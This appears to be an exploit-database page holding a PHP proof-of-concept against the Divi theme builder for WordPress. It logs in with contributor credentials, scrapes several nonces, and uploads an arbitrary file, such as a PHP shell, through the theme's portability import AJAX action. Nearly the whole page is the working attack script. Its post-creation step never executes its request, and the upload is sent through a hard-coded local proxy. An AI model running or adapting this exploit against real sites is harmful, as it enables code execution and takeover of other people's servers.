Share
## https://sploitus.com/exploit?id=WPEX-ID:10342
Usage: php poc.php url username password filetoupload

Once the file is uploaded after running the script, you can access the file from the most current uploads directory.Example: http://URL/wp-content/uploads/2020/07/divipoc.php

<?php

// Settings
$siteurl = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
$upfile = $argv[4];

$proxy = '127.0.0.1:8080';
$urlbits = parse_url( $siteurl );
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';
$uploadinfo=array('dir'=>'..','folder'=>'/inc');

//Json Encode Our New Post
$data = array(
    "title" => "Exploit Post",
    "content" => "<!-- wp:paragraph -->\nSample\n<!-- /wp:paragraph -->",
    "status"=>"pending");

$postdata = json_encode($data);

//Get Json post data length
$length = strlen($postdata);

echo 'Logging in!';

// 1) Log in as contributor+
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $siteurl . 'wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

echo 'Grabbing Rest API!';
// Pull the Rest API Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . 'wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Rest API Nonce
preg_match('/wp\.apiFetch\.createNonceMiddleware\(\s"([^"]+)"\s\)/', $content, $matches);
$restnonce = $matches[1];

echo 'Creating New Post and Grabbing Page ID!';
//Create New Post
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . 'wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json',
    "X-WP-Nonce: $restnonce",
    "Content-Length: $length"));
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);

//Grab the page-id
preg_match('/"id":([^"]+),/', $content, $matches);
$pageid = $matches[1];

echo 'Grabbing Activation Nonce!';
// Pull the Import Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '?=' . $pageid . '&et_fb=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Import Nonce
preg_match("/et\_fb\_activation\_nonce\=([^']+)\'/", $content, $matches);
$activationnonce = $matches[1];

echo 'Activating Theme Builder For Post!';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '?=' . $pageid . '&et_fb_activation_nonce=' . $activationnonce);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

echo 'Getting Another Nonce!';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '?=' . $pageid . '&et_fb=1&PageSpeed=off');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Import Nonce
preg_match('/etCorePortability\s=\s\{"nonces":\{"import":"([^"]+)"/', $content, $matches);
$importnonce = $matches[1];

echo 'Uploading file!';
//Upload a file
$ch = curl_init();
$cFile = curl_file_create( realpath( $upfile ) );
curl_setopt( $ch, CURLOPT_URL, $siteurl . 'wp-admin/admin-ajax.php' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'action' =>  'et_core_portability_import',
    'include_global_presets' => 'undefined',
    'nonce' => $importnonce,
    'content' => 'false',
    'context' => 'et_builder',
    'file' => $cFile
] );

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>